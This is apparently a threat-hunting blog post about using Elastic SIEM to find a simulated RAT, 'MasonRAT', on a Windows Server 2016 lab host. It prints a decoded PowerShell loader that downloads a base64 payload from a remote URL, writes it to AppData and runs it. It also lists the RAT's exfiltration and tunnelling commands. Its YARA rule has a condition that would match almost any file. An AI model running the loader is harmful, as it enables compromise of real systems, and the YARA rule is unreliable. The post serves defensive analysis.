Threat Hunting on Windows Server 2016: Uncovering Hidden C2 Malware Using Elastic SIEM

1.0 Introduction

In the first quarter of 2025, Dragos reported 708 ransomware incidents impacting industrial entities worldwide, up from approximately 600 in the previous quarter [1]. Notably, manufacturing accounted for 68% of these incidents, underscoring the sector’s vulnerability to ransomware attacks [1]. Additionally, the Lumma Stealer malware infected over 394,000 Windows PCs globally between March 16 and May 16, 2025 [3]. This infostealer was designed to exfiltrate sensitive information such as credentials and financial data, reflecting the increasing sophistication of modern malware threats [2] [3].

Furthermore, the U.S. Department of Justice recently charged 16 Russian nationals linked to DanaBot, a modular malware used in cybercrime, espionage, and wartime operations. DanaBot, which infected over 300,000 systems, evolved from a banking trojan into a tool capable of executing credit card theft, cryptocurrency fraud, ransomware deployment, and intelligence collection [4]. These developments highlight the escalating complexity and volume of cyber threats in 2025, reinforcing the need for structured threat hunting methodologies to proactively detect and respond to malicious activity.

In today’s evolving threat landscape, adversaries are increasingly leveraging stealthy techniques to maintain persistence within enterprise environments. One common tactic involves deploying Command and Control (C2) malware that blends in with legitimate system activity, making detection difficult particularly on critical infrastructure such as Windows Server 2016.

To detect and analyse these sophisticated threats, we adopt a structured threat hunting approach, guided by formal frameworks like the MITRE ATT&CK Framework. Structured hunting focuses on identifying indicators of attack (IoAs) and the tactics, techniques, and procedures (TTPs) used by known threat actors. The MITRE ATT&CK Framework serves as a comprehensive knowledge base of adversary behaviour, enabling analysts to proactively hunt for threats by aligning observations with well-defined attack patterns.

1.2 Structured threat hunting

Structured threat hunting is a proactive cybersecurity approach that leverages formal frameworks, such as the MITRE ATT&CK framework, to systematically detect and analyse sophisticated threats within enterprise environments [5]. Unlike reactive methods that rely solely on alerts, structured threat hunting involves the deliberate search for indicators of attack (IoAs) and tactics, techniques, and procedures (TTPs) employed by known threat actors.

The MITRE ATT&CK framework serves as a comprehensive knowledge base categorizing adversary behaviors observed in real-world cyberattacks. By aligning threat hunting activities with this framework, security professionals can anticipate attacker behaviors and identify potential threats that may evade traditional detection mechanisms [5].

In the context of Windows Server 2016, structured threat hunting becomes particularly crucial due to the critical nature of the infrastructure and the increasing sophistication of adversaries. By employing structured methodologies, organizations can enhance their security posture, proactively identify hidden threats, and mitigate risks associated with Command and Control (C2) malware and other advanced persistent threats.

This approach not only improves the detection capabilities but also ensures a systematic and comprehensive analysis of potential threats, thereby strengthening the overall cybersecurity framework of the organization.

1.3 Case Scenario

In this blog post, we will explore practical threat hunting techniques on a Windows Server 2016 system, specifically focusing on the host WIN-O1NAD4LU04Q. Our objective is to identify potential signs of Command and Control (C2) malware by hunting for suspicious files such as .bat, .ps1, and .exe that may indicate malicious activity.

Using Elastic SIEM, we’ll start by performing broad searches to surface any potentially relevant artifacts. From there, we’ll progressively filter and refine the results to isolate high-confidence indicators of compromise (IOCs) and uncover any hidden threats lurking within the environment. By applying structured queries, filtering noisy data, and narrowing down on anomalous behaviours, we aim to demonstrate how Elastic SIEM can be leveraged to uncover hidden threats and improve your overall security posture.

Throughout this process, we will align our findings with relevant tactics and techniques from the MITRE ATT&CK Framework, such as:

• T1059 – Command and Scripting Interpreter: Detecting the use of command-line interpreters like PowerShell and CMD, which are often used in malicious scripts.
• T1105 – Ingress Tool Transfer: Monitoring for the transfer of tools or files from external sources, which could indicate the download of malicious payloads.
• T1027 – Obfuscated Files or Information: Identifying signs of obfuscated scripts or files, which attackers use to hide malicious code.
• T1218 – Signed Binary Proxy Execution: Detecting the misuse of legitimate Windows binaries to execute malicious code.

By mapping our threat hunting activities to these techniques, we can create targeted queries and detection rules within Elastic SIEM to identify suspicious behaviours indicative of C2 malware.

1.4 Lab Setup

To replicate this threat hunting scenario, we establish a controlled lab environment simulating a Windows Server 2016 host potentially compromised by Command and Control (C2) malware. The lab is designed to facilitate the detection and analysis of malicious activities using Elastic SIEM, with configurations tailored to align with the MITRE ATT&CK framework.

1.4.1 Windows Server 2016 (Target Host)

• Virtualization Platform: VMware Workstation / Fusion / VirtualBox
• Operating System: Windows Server 2016
• Hostname: WIN-O1NAD4LU04Q
• Allocated Resources:
  • RAM: 8 GB (recommended for optimal performance)
  • Processors: 6 vCPUs
• Network Configuration:
  • Type: LAN (segmented)
  • Internet Access: Via OPNsense WAN interface with NAT
• Installed Tools:
  • Sysmon: For detailed system monitoring and logging.
  • Elastic Agent: For log collection and forwarding to Elastic SIEM [6]

1.4.2 Elastic SIEM Server

• Virtualization Platform: VMware Workstation / Fusion / VirtualBox
• Operating System: Ubuntu Server 22.04 LTS
• Allocated Resources:
  • RAM: 16 GB
  • Processors: 12 vCPUs
• Network Configuration:
  • Type: NAT
• Elastic Stack Components:
  • Elasticsearch: For storing and searching log data.
  • Kibana: For data visualization and dashboarding.
  • Fleet Server: For managing Elastic Agents [7]

This setup enables comprehensive monitoring and analysis of the Windows Server 2016 host, facilitating the identification of malicious activities such as the execution of suspicious scripts or binaries. By leveraging Sysmon for detailed event logging and Elastic SIEM for data aggregation and visualization, we can effectively detect and investigate behaviours associated with C2 malware.

For guidance on installing and configuring Elastic Agents, refer to the official Kali Purple documentation [8]

2.0 Threat Hunting Approach

Threat hunting goes beyond relying on automated alerts. In many cases, no alert may be triggered either because the malicious activity slipped through undetected or due to limitations in the detection rules or EDR capabilities. Threat hunters proactively analyse various aspects of system and network logs to uncover anomalies, derive insights, and identify potential security threats that may otherwise go unnoticed.

In Elastic SIEM, when the Elastic Agent and Sysmon are properly configured, we can simulate specific attack scenarios to evaluate detection coverage. This helps us understand what triggers alerts and just as importantly what does not.

In this lab, we simulate a real-world attack by deploying a public Remote Access Trojan (RAT) as a C2 implant. The goal is to observe how Elastic SIEM and the underlying telemetry respond. To further challenge the detection mechanisms, we experiment with malware obfuscation by encrypting or packing the RAT payload using various methods [9]. While many variants were successfully blocked by the EDR, one obfuscated sample bypassed detection entirely indicating a possible detection gap.

Despite the absence of an alert, this is where threat hunting becomes critical. By analysing artifacts, process behaviours, file system changes, and command-line activity related to the incident, we aim to uncover the presence of this undetected malware and assess the environment’s resilience to such evasion techniques.

As shown in Figure 1, numerous alerts have been generated likely due to the various simulations we’ve previously conducted in this environment. However, our focus now shifts to analyzing the events that did not trigger any alerts. These could represent stealthier activity or reveal gaps in existing detection logic.

Figure 1.

To begin our manual investigation, we navigate to the Discover section in Elastic. Here, we leverage the MITRE ATT&CK technique T1027 – Obfuscated Files or Information, which focuses on identifying signs of obfuscated or suspicious files commonly used to hide malicious behaviour.

We start by querying for a range of potentially malicious file types known to be abused by attackers, using the following KQL search:

process.name : ("*.bat" or "*.exe" or "*.ps1" or "*.vbs" or "*.js" or "*.hta" or "*.cmd" or "*.wsf" or "*.scr" or "*.cpl" or "*.dll")

This query helps surface script files, binaries, and dynamic-link libraries that could be associated with malicious activity as shown in Figure 2. From there, we filter through the results looking for unusual file names, suspicious parent-child process relationships, execution from uncommon directories, or other deviations from normal behaviour that may indicate obfuscation or unauthorized execution.

Figure 2.

By approaching the hunt this way, we increase our chances of catching threats that may have silently bypassed detection rules.

2.1 Log Volume Reduction and Host Filtering

Upon reviewing the dataset, we are presented with approximately 789,640 log entries. This high volume is expected, as it includes a wide range of telemetry such as network traffic, TCP/IP connections, and events from multiple sources including firewalls, Linux hosts, and other Windows machines connected to the network.

To make our threat hunting process more efficient and focused, we need to isolate logs specifically related to our target system: Windows Server 2016.

To do this, we navigate to the Data View section in Kibana. From there, we use the user.name or relevant host-identifying field (such as host.name or agent.name, depending on your setup) to filter the dataset.

We then select the specific hostname, in this case WIN-O1NAD4LU04Q, to ensure our analysis only includes logs originating from the intended server as shown in Figure 3 .

Fig 3. host.name

This significantly reduces noise and allows us to concentrate our investigation on events that could indicate suspicious or malicious activity within the targeted host as shown in Figure 4.

Figure 4. win2016

2.2 File Path Insights and Filtering

By examining the field statistics for file paths, we observe the top values contributing to the dataset. Notably, a large portion 64.3% comes from a single executable located at:

C:\Users\Win2016\AppData\Roaming\n5hxte0v.exe

Other common entries include temporary installation files and runtime libraries typically associated with legitimate software, such as:

• Sublime Text Update Installer.exe
• vcredist_x64.exe
• Various .dll files from software setups

Additionally, several .dll files were found under the Downloads directory, such as:

C:\Users\Win2016\Downloads\sublime_text_build_4192_x64\libcrypto-1_1-x64.dll
C:\Users\Win2016\Downloads\sublime_text_build_4192_x64\libssl-1_1-x64.dll

Since these are mostly benign support files, we’ll exclude common extensions such as *.dll, *.js, *.hta, *.cmd, *.wsf, *.scr, and others from our search to reduce noise.

Instead, our focus will narrow to activity within the Downloads directory, where users typically save external executables or archives. This path is often used by attackers to stage payloads or initiate initial infection vectors. As shown in Figure 5, this refined view helps us focus on files that were actively downloaded and may warrant further inspection especially if they are uncommon, unsigned, or were executed shortly after being saved.

Figure 5.

2.3 Filtering by File Extension

By analysing the file.extension field in the Data View, we can observe trends over time and identify the most common file types encountered in the environment. As shown in Figure 6, the top values include:

• .wxl
• .rtf
• .exe
• .dll
• .bat
• and several others

Figure 6

While some of these such as .rtf or .dll may be benign or associated with normal system and application activity, we are particularly interested in extensions often abused for malicious purposes.

As such, our focus narrows to .bat (batch scripts) and .exe (executables), which are commonly used by attackers for initial execution, privilege escalation, or persistence mechanisms. By concentrating our analysis on these file types, we aim to uncover suspicious behaviour or artefacts that may indicate C2 activity or lateral movement.

2.4 Focusing on Suspicious Executables

In this section, we have filtered the logs to focus specifically on .exe and .bat files file types frequently leveraged by adversaries for execution of payloads, scripts, or living-off-the-land techniques.

As shown in Figure 7, these file types appear prominently between April and May. This observation provides a useful window for investigation, particularly for detecting potential C2 activity, lateral movement, or persistence mechanisms.

Figure 7

To refine our analysis, we narrow our search to .exe and .bat files located within the Downloads directory:

C:\Users\Win2016\Downloads\

This focus helps isolate user-downloaded or attacker-delivered binaries that may have been executed during the suspected timeframe.

We align this analysis with the following MITRE ATT&CK techniques:

• T1059 – Command and Scripting Interpreter: Identifying the use of interpreters such as CMD or PowerShell via .bat files.
• T1204 – User Execution: Detecting user-initiated execution of files typically delivered via phishing, drive-by downloads, or shared folders.
• T1105 – Ingress Tool Transfer: Monitoring executables dropped in user directories that may have been transferred from external sources.

By correlating these techniques with the observed activity, we can prioritise leads and flag behaviour that is consistent with known adversary tradecraft.

3.0 Investigating the BAT File Downloaded on Windows Server 2016

While numerous .exe files were observed in the Downloads directory many of which were flagged by the XDR our attention turns to the .bat file, which notably did not trigger any alerts. This makes it a prime candidate for manual analysis, especially as stealthy payloads often rely on scripts to execute secondary stages of an attack as shown in Figure 8.

Figure 8

We identify two related events involving a .bat file on April 15, 2025 at 17:58:53.296, both associated with the same download.

3.1 Initial Observation of cyecsk.bat

From the logs, we observe that the file cyecsk.bat was downloaded via Chrome, and is located in the following path:

C:\Users\Win2016\Downloads\cyecsk.bat

3.2 Threat Analysis and Observation

Further investigation into the .bat file activity revealed that the event log includes a PowerShell command embedded within the file. The field winlog.event_data.Contents contains an encoded base64 payload. Although we will not decode it here, the use of base64 encoding is a common obfuscation method used to hide the true intent of a script or command.

The PowerShell command uses the following options:

• ExecutionPolicy Bypass
• NoProfile
• Command

These switches are typical in malicious use cases where the attacker aims to suppress warnings, avoid loading a standard PowerShell profile, and execute a command directly usually in a stealthy manner.

The parent process identified is chrome.exe, indicating the file was likely delivered through the browser and then staged or executed on the system.

As shown in Figure 9, the .bat file contains a PowerShell command that attempts to execute the script shown below in base64.

powershell -ExecutionPolicy Bypass -NoProfile -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('CiRiYXNlNjQgPSAoaXdyIC1VcmkgJ2h0dHBzOi8vZmlsZXMuY2F0Ym94Lm1vZS9jNmg0M3UudHh0JykuQ29udGVudAokYnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRiYXNlNjQpCiRw5QYXRoXTo6Q29tYmluZSgkZW52OkFQUERBVEEsICdtYXNvbmRscG41ay5iYXQnKQpbU3lzdGVtLklPLkZpbGVdOjpXcml0ZUFsbEJ5dGVzKCRwYXRoLCAkYnl0ZXMpClN0YXJ0LVByb2Nlc3MgLUZpbGVQYX-----==')) | Invoke-Expression"

Please note the base64 is not complete here

This activity aligns with several techniques in the MITRE ATT&CK framework:

• T1059.001 – PowerShell

  The attacker uses PowerShell as the execution medium, a common post-exploitation tactic due to its native capabilities and scripting flexibility.

• T1027 – Obfuscated Files or Information

  The use of base64 encoding within a PowerShell command is a classic example of content obfuscation designed to evade detection and complicate analysis.

• T1204.002 – User Execution: Malicious File

  The presence of a .bat file downloaded via a web browser, likely requiring user interaction to initiate, suggests social engineering or user-driven execution.

• T1105 – Ingress Tool Transfer

  Since the PowerShell command appears to reference external content (indicated by the presence of System.Net.WebClient-style activity in the encoding), this may involve downloading additional payloads from a remote server.

This combination of scripting, obfuscation, and external delivery strongly indicates a malicious intent behind the file cyecsk.bat. Although it was not flagged by the XDR.

3.3 Decoding the Base64 Observed in the BAT File Executed via PowerShell

While the presence of base64-encoded commands in PowerShell is a common tactic used by adversaries to evade detection, decoding these strings is essential for understanding the intent of the payload. Analysts can decode base64 using any tool of their choice command-line utilities, scripting languages, or online tools.

For the purpose of this blog, we use the online decoder [10]. As shown in Figure 10, we successfully decoded the base64 string into a readable PowerShell script.

The decoded output is as follows:

$base64 = (iwr -Uri 'https://files.example.me/c6h43u.txt').Content
$bytes = [System.Convert]::FromBase64String($base64)
$path = [System.IO.Path]::Combine($env:APPDATA, 'masondlpn5k.bat')
[System.IO.File]::WriteAllBytes($path, $bytes)
Start-Process -FilePath $path

3.3.1 Threat Context and MITRE ATT&CK Mapping

This activity demonstrates a layered execution approach typical of many malware loaders. It also aligns with several MITRE ATT&CK techniques [11]

Decoded Script Analysis and MITRE ATT&CK Mapping

Step	Action	Description	MITRE ATT&CK Technique
1	Remote File Retrieval	Downloads a base64-encoded payload from a remote server using Invoke-WebRequest.	T1105 – Ingress Tool TransferTransfer of external resources into the environment.
2	Decode Payload	Decodes the downloaded content using [System.Convert]::FromBase64String() into binary form.	T1027.001 – Obfuscated Files or Information: EncodingBase64 encoding used to conceal content.
3	Write to Disk	Saves the decoded content to %APPDATA%\masondlpn5k.bat, a user-accessible directory.	T1074.001 – Data Staged: Local StorageLocal storage of scripts or binaries before execution.
4	Execute Dropped File	Executes the staged .bat file using Start-Process.	T1059.003 – Command and Scripting Interpreter: Windows Command ShellUse of .bat file and cmd execution.

3.4 Visiting the URL Contained in the Base64

When visiting the URL embedded in the decoded PowerShell script:

https://files.example.me/c6h43u.txt

we observe that it hosts a much longer base64-encoded string, as shown in Figure 11.

Figure 11

This suggests that the hosted content is likely a binary file, given the size and structure of the encoded data.

3.4.1 Decoding the Payload

In cases like this, analysts should be cautious and work within a secure, isolated environment (e.g., REMnux or a sandboxed VM) before interacting with or decoding any suspicious content.

To convert the base64 string into its binary form, analysts can use any suitable tool. For this blog, we use the online decoder [12]

As shown in Figure 12, we paste the base64 string into the input field and decode it into a downloadable file. Once the decoding is complete, the file can be saved locally for further analysis.

Figure 12

⚠️ Important Note: Always perform such actions within a controlled and secure environment to avoid accidental execution or compromise. Tools like REMnux, FLARE VM, or any offline malware lab VM are recommended for this purpose.

4.0 Extracting Indicators of Compromise (IoCs) from the Binary File

After decoding the base64 payload from the remote URL, we obtain a file named application.bin. Surprisingly, even with Windows Defender enabled as shown in Figure 13, the file is not flagged as malicious. Given the behaviour observed earlier, this is not unexpected attackers often use obfuscation or packers to bypass signature-based detection.

Figure 13

We proceed by transferring application.bin into a dedicated, isolated malware analysis environment. At this stage, the Windows analysis machine has internet access disabled to prevent any potential callback or data exfiltration attempts.

Although tools like VirusTotal or Any.run can provide valuable insights, we choose to perform static analysis first to avoid tipping off the adversary or exposing controlled infrastructure to external systems.

4.1 Overview of MasonRAT

MasonRAT appears to be a heavily modularised, .NET-based Remote Access Trojan as shown in Figure 14. It leverages a large set of classes with obfuscated or generic names to hinder static analysis. Each top-level class (e.g. Activation, Completed, Incomplete, etc.) contains numerous methods and properties related to RAT functionality.

Figure 14

4.2 Command Dispatch Logic in Activation Class

This class acts as a command interpreter, responding to specific string commands (e.g., "GetDrives", "FileManager", etc.) likely received from a C2 server. Each block performs different actions on the infected host and returns results to the attacker via Completed.Dominican(...).

4.2.1 Behavioural Analysis Table Activation Class

Command	Action Performed	Purpose / Threat
GetDrives	Enumerates logical drives and responds with metadata.	Reconnaissance
FileManager	Handles file/folder listing, selection, or possibly exploration.	File system access
GOTO	Retrieves paths to known directories (Desktop, AppData, Temp, UserProfile, Startup).	Recon + lateral movement
Delete	Deletes a specified folder or file.	Destructive capability
Execute	Executes a file or command.	Code execution
ExecuteRunAs	Runs a file as administrator using cmd.exe with runas.	Privilege escalation
Rename	Renames a file or folder.	File manipulation
tss	Reads the contents of a text file and sends it to C2.	Data exfiltration
sedit	Overwrites or edits the content of a text file.	Data modification
viewimage	Loads an image file, resizes it, encodes it as PNG, and sends it to C2.	Visual exfiltration
hidefolderfile	Applies hidden attribute to a file or folder.	Anti-forensics
showfolderfile	Removes hidden attribute.	Operational control
creatnewfolder	Creates a new directory.	Persistence or staging
creatfile	Creates an empty file.	Payload preparation
downloadfile	Reads a file, encodes it (Base64), and sends it to C2.	File exfiltration
sendfileto	Receives and writes a file to disk, possibly decoded from Base64.	File deployment
DelP	Calls a method del on a COM/ActiveX object (likely to delete a persistence or artefact).	Anti-forensics
7zIT	Calls install method on object likely decompresses and installs 7-Zip or other payloads.	Tool deployment
NETINS	Installs a payload conditionally if not already installed.	Persistence
7zzip	Executes 7-Zip silently from Temp directory.	Extraction or payload staging
CPP	Appears to split strings and call arbitrary methods with reflection or late-binding.	Dynamic code execution
ngrok	Indicates Ngrok-related configuration or tunnel setup.	Tunnelling (C2, RDP)
InstallN	Installs a service or tool and marks the install complete (Confidential = 0).	Payload deployment
hrdp	Checks for ngrok.exe in Temp. Responds accordingly.	Remote desktop tunnelling
hrdp+	Installs or configures remote access via late-bound methods (possibly RDP relay).	Remote access

The Activation class in MasonRAT serves as the central command handler, executing instructions received from its command and control (C2) server. It is responsible for a wide range of tasks including gathering system and directory information, managing files (such as creating, deleting, renaming, and hiding them), exfiltrating data like files and images, launching arbitrary processes with or without elevated privileges, and deploying additional tools like 7-Zip and Ngrok. The class also facilitates remote access setup, including tunnelling remote desktop sessions through Ngrok, and it leverages late-bound method invocation to dynamically call functionality at runtime. We also observed the presence of PreventSleep, PSleep, and taskkill.exe, as shown in Figure 15. These tools are often used in malicious scripts to manipulate system behaviour during execution. PreventSleep and PSleep are typically used to stop the system from entering sleep or idle mode, which helps ensure that the malicious process runs uninterrupted.

Figure 15

Meanwhile, taskkill.exe, a legitimate Windows utility, is commonly abused by attackers to terminate security-related processes such as antivirus software or monitoring tools. The use of these utilities suggests an attempt to maintain operational continuity and evade detection during execution.

In terms of capabilities, the RAT demonstrates persistence techniques through commands like Startup, InstallN, and NETINS, which suggest it attempts to maintain access across system reboots. It includes remote access functionality via commands such as hrdp, hrdp+, and ngrok, which indicate support for tunnelling or proxying remote desktop sessions. Anti-forensic behaviour is also present, with features designed to hide files and folders, delete artefacts, and rename system objects to evade detection. The frequent use of NewLateBinding.LateCall() reflects an intent to evade static analysis by dynamically resolving and invoking methods at runtime.

Data exfiltration is handled using encoded transmissions, where files, text, or images are read, processed (often encoded in Base64 or otherwise obfuscated), and sent using helper functions such as Completed.Dominican() and Violation.Valuation(). Additionally, the malware uses obfuscation techniques that rely heavily on the VB.NET runtime for example, using Operators.AddObject and ConcatenateObject along with utility functions like Activation.Interpreted to build strings and payloads at runtime, which makes static inspection more difficult.

The activation sequence also includes actions such as delete, folder, file, execute, and ExecuteRunAs, as shown in Figure 16. These actions indicate that the binary is capable of modifying the file system by deleting files or folders, executing commands, and potentially running processes with elevated privileges. Such behaviour is commonly associated with malware attempting to perform system changes, launch additional payloads, or escalate privileges.

Figure 16

Overall, Activation represents a stealthy and modular component of the RAT, engineered for flexible command execution, persistent access, remote control, and evasion from traditional analysis methods.

4.3 Extracting the IoC

While it is not feasible to examine the entire source code of the malware, we can analyse parts of it to identify key indicators of compromise (IoCs). In this phase, we focus on the Traveller class within the MasonRAT malware.

The Traveller class serves as a container for several static fields and methods that either hold configuration values or assist in the malware’s runtime operations. Notably, this class contains hardcoded values that can be considered clear IoCs.

One of the most evident indicators is the field Directors, which is statically assigned the IP address 192.168.135.20 as shown in Figure 17. Although this is a private IP address (RFC1918), and therefore not routable on the public internet (Because we simulated the attack via LAB), that would be the C2 staging IP.

Figure 17

Another field, Valuation, is assigned the string "1417". represent a port number. Similarly, the field Advertising holds the string "USB.exe", which is the name of a dropped or executed payload a possible mechanism for spreading via USB drives.

The field Improving is set to "MasonRAT" and Prototype is set to "MasonGroup", both of which are potentially developer-chosen identifiers that could appear in file names, mutexes, registry entries, or process names on compromised systems. These values are useful for building YARA or Sigma detection rules.

The class also contains a field named Elsewhere, with a seemingly random string: "rmldKj40qW2UTlEe". This may be used as a password, encryption key, or mutex name. It is also declared as readonly, suggesting it does not change during runtime, further supporting its use as a static key or identifier.

Additionally, the Infringement field dynamically captures the full path of the current running executable using Process.GetCurrentProcess().MainModule.FileName. This is likely used for self-reference, replication, or verification purposes.

Finally, Distributed is declared as a Mutex, a common technique in malware to ensure that only one instance of the RAT runs on a system at any given time. This is typically used to prevent conflicts or multiple infections.

Type	Value	Context / Use
IP Address	192.168.135.20	Lab C2 address used for development or staging.
Port / Channel ID	1417	C2 port
Filename / Executable	USB.exe	An executed payload for lateral movement or USB spreading.
Malware Identifier	MasonRAT	Internal name used to tag this malware variant. May appear in logs or configs.
Group Identifier	MasonGroup	Threat actor or campaign name. Can help link related activity.
Static String (possibly mutex/key)	rmldKj40qW2UTlEe	May serve as a hardcoded key, mutex name, or password.
Executable Path (dynamic)	Process.GetCurrentProcess().MainModule.FileName	Captures the full path of the running binary; used for self-reference.
Mutex Object	Distributed	Used to prevent multiple instances; may have a dynamic or static name.

4.4 Final YARA Rule (Binary + Strings + Heuristics)

rule MasonRAT_Signature_Composite
{
    meta:
        author = "daniyyell"
        description = "Composite detection rule for MasonRAT using binary traits, constants, and identifiers"
        version = "1.1"
        date = "2025-05-24"
        family = "MasonRAT"

    strings:
        $m0 = { 4D 5A 90 00 }  

        // Known class/function patterns
        $s1 = "MasonRAT" ascii nocase
        $s2 = "Activation.Interpreted" ascii nocase
        $s3 = "Violation.Valuation" ascii nocase
        $s4 = "Completed.Dominican" ascii nocase
        $s5 = "Specifically" ascii nocase

        // Numeric constants from disassembly (integer values shown)
        $n1 = { 16 00 }                     // 0x0016
        $n2 = { DA 00 16 00 }               // 0xDA0016 (Little Endian)
        $n3 = { 82 73 7D 00 }               // 131727382 (0x07D27382)
        $f1 = { 3E AA AA 2A }               // 3.2801e-34 (approx float)
        $d1 = { 9A 99 99 99 99 99 F1 3F }   // 3.05981e-308 (approx double)

        // Hardcoded artefacts
        $s6 = "USB.exe" ascii nocase
        $s7 = "rmldKj40qW2UTlEe" ascii nocase
        $s8 = "GetDrives" ascii nocase
        $s9 = "viewimage" ascii nocase
        $s10 = "ngrok" ascii nocase

    condition:
        $m0 at 0 and
        (5 of ($s*) or all of ($f1, $d1, $n3)) or
        any of ($n*)
}

4.5 VirusTotal Analysis

To supplement our static analysis, we submitted the decoded binary to VirusTotal for a broader threat intelligence perspective. The results, available at the link below, confirm the suspicious nature of the file [13] [14]

As shown in Figure 18, 42 out of 71 security vendors flagged the file as malicious, supporting our earlier assessment that this was a staged payload designed to bypass endpoint detection and deliver a follow-on compromise.

Figure 18

4.5.1 MITRE ATT&CK Tactics and Techniques Mapping

Based on the behaviours observed throughout this investigation from initial script execution to payload staging and potential command-and-control activity the following MITRE ATT&CK tactics and techniques are applicable in this table bellow:

Tactic	ID	Description
Execution	TA0002	The attacker used .bat and PowerShell scripts to run malicious commands.
Persistence	TA0003	The downloaded script could be modified to establish persistence (e.g. autorun).
Privilege Escalation	TA0004	Potential for privilege abuse depending on payload functionality.
Defense Evasion	TA0005	Base64 encoding and execution via PowerShell bypassed initial detection layers.
Discovery	TA0007	The binary may include host or network enumeration routines.
Collection	TA0009	If executed, the malware may collect user or system data.
Command and Control	TA0011	The use of remote download links and staged execution is consistent with C2.
Impact	TA0040	Final payload could include destructive or disruptive functions.

These mappings provide a structured framework for understanding the attacker’s objectives and methods. They also support proactive detection and response efforts by aligning observable behaviours with widely recognised threat models.

5.0 Conclusion

This blog walked through a practical threat hunting scenario aimed at identifying hidden Command and Control (C2) malware on a Windows Server 2016 system using Elastic SIEM.

Starting with an investigation into file types such as .bat and .exe in the Downloads folder, we identified a suspicious .bat file that evaded XDR detection. Further analysis revealed the file executed a base64-encoded PowerShell command that downloaded and decoded a secondary binary (application.bin).

Although the final payload was blocked by the XDR, static analysis using dnSpy and external validation with VirusTotal confirmed its malicious nature. This highlights the value of layered defence and manual threat hunting in surfacing threats that may initially go undetected.

This investigation aligned with several MITRE ATT&CK techniques, including:

• T1059.001 – PowerShell
• T1027.001 – Obfuscated Files or Information
• T1105 – Ingress Tool Transfer
• T1204.002 – User Execution

This case underscores the importance of combining proactive threat hunting with automated detection. Tools like Elastic SIEM, when supported by detailed telemetry (e.g. from Sysmon) and attacker behaviour frameworks like MITRE ATT&CK, are critical for defending against stealthy and evolving threats.

5.1 Findings and Limitations

It is important to acknowledge the limitations of our lab environment while interpreting the findings of this investigation.

Our analysis was based on a controlled lab setup, with Elastic SIEM configured using a limited set of detection rules and data sources. While this was sufficient to demonstrate key threat hunting techniques, it does not fully represent the capabilities of a production-grade Elastic Security deployment.

As shown in Figure 19, the visibility and telemetry available are inherently restricted by the scope of the installed rules and ingested data. This means some advanced detections such as behavioural analytics, ML-based models, or full threat intelligence enrichment were not available in this environment.

Figure 19

However, this should not be seen as a limitation of Elastic itself. The full enterprise edition of Elastic Security provides significantly enhanced capabilities, including:

• A broader and continuously updated set of detection rules
• Machine learning integrations
• Host isolation and response capabilities
• Integration with threat intelligence platforms
• Advanced correlation and visualisation features

Despite the constraints of our setup, this exercise clearly demonstrated that Elastic SIEM remains a powerful platform for proactive threat hunting, even with a basic configuration especially when paired with structured methodologies like MITRE ATT&CK.

5.2 Future Work

As part of future analysis, it would be worthwhile to explore the other .exe files observed during the initial data review particularly the executable located at:

C:\Users\Win2016\AppData\Roaming\n5hxte0v.exe2940

This file accounted for approximately 64% of all observed process activity, making it highly suspicious. Its high prevalence, coupled with its location in the user’s roaming profile directory, may suggest persistent or automated execution both common in malware staging or lateral movement scenarios.

Further steps may include:

• Static and dynamic analysis of the executable
• Correlation with process tree relationships
• Checking for persistence mechanisms such as registry run keys or scheduled tasks
• Reverse engineering using tools like dnSpy, Ghidra, or x64dbg
• Mapping any observed behaviours back to MITRE ATT&CK techniques

This additional work will help determine whether this .exe represents another stage of the malware, a loader, or possibly a separate threat altogether.

6.0 References

1. A. H. Alamri and L. Mooney, Dragos Industrial Ransomware Analysis: Q1 2025, Dragos – Industrial (ICS/OT) Cyber Security, May 21, 2025. https://www.dragos.com/blog/dragos-industrial-ransomware-analysis-q1-2025 (accessed May 24, 2025).

2. Economic Times, What Is Lumma Stealer? The Malware That Infected Over 394,000 Windows PCs Worldwide, The Economic Times, May 21, 2025. https://economictimes.indiatimes.com/news/international/global-trends/what-is-lumma-stealer-the-malware-that-infected-over-394000-windows-pcs-worldwide/articleshow/121321782.cms (accessed May 24, 2025).

3. Check Point, April 2025 Malware Spotlight: FakeUpdates Dominates as Multi-Stage Campaigns Blend Commodity Malware with Stealth, Check Point Blog, May 09, 2025. https://blog.checkpoint.com/research/april-2025-malware-spotlight-fakeupdates-dominates-as-multi-stage-campaigns-blend-commodity-malware-with-stealth (accessed May 24, 2025).

4. A. Greenberg, Feds Charge 16 Russians Allegedly Tied to Botnets Used in Ransomware, Cyberattacks, and Spying, Wired, May 22, 2025. https://www.wired.com/story/us-charges-16-russians-danabot-malware/ (accessed May 24, 2025).

5. M. Kosinski, What Is Threat Hunting?, IBM, Jan. 07, 2025. https://www.ibm.com/think/topics/threat-hunting

6. J. Camiss, How to Build a SIEM with Suricata and Elastic Stack on Ubuntu 20.04, DigitalOcean, Feb. 14, 2022. https://www.digitalocean.com/community/tutorials/how-to-build-a-siem-with-suricata-and-elastic-stack-on-ubuntu-20-04

7. Elastic, Install Elastic Agents, Elastic.co, 2025. https://www.elastic.co/docs/reference/fleet/install-elastic-agents (accessed May 24, 2025).

8. Kali-Purple, Kali Linux / kali-purple / Documentation, GitLab, 2025. https://gitlab.com/kalilinux/kali-purple/documentation (accessed May 24, 2025).

9. IBM, What Is Malware?, IBM, Apr. 14, 2022. https://www.ibm.com/think/topics/malware (accessed May 24, 2025).

10. Base64, Base64 Decode Online, emn178.github.io. https://emn178.github.io/online-tools/base64_decode.html (accessed May 24, 2025).

11. IBM, MITRE ATT&CK Framework, IBM, May 18, 2023. https://www.ibm.com/think/topics/mitre-attack (accessed May 24, 2025).

12. Base64 Guru, Base64 to File: Base64 Decode and Converter, base64.guru, 2025. https://base64.guru/converter/decode/file (accessed May 24, 2025).

13. VirusTotal, VirusTotal, VirusTotal.com, 2025. https://www.virustotal.com/gui/file/751b6b68106dd134ec72066359e9ff28cbdf8d7b43468c684541b5f21a44fbbc/detection (accessed May 24, 2025).

14. Manalyzer.org, Manalyzer :: 4830c0961026e3c8c9f8795df408edbd, Manalyzer.org, 2025. https://manalyzer.org/report/4830c0961026e3c8c9f8795df408edbd (accessed May 24, 2025).